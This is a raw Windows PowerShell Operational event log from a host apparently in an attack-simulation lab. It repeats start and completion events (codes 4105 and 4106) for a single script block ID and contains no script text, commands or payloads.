SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468917
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468916
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468915
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468914
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468913
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468912
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468911
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468910
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468909
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468908
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468907
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468906
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468905
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468904
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468903
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468902
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468901
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468900
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468899
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468898
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468897
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468896
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468895
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468894
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468893
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468892
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468891
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468890
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468889
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468888
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468887
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468886
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468885
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468884
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468883
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468882
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468881
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468880
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468879
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468878
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468877
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468876
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468875
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468874
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468873
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468872
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468871
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468870
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468869
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468868
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468867
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468866
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468865
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468864
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468863
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468862
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
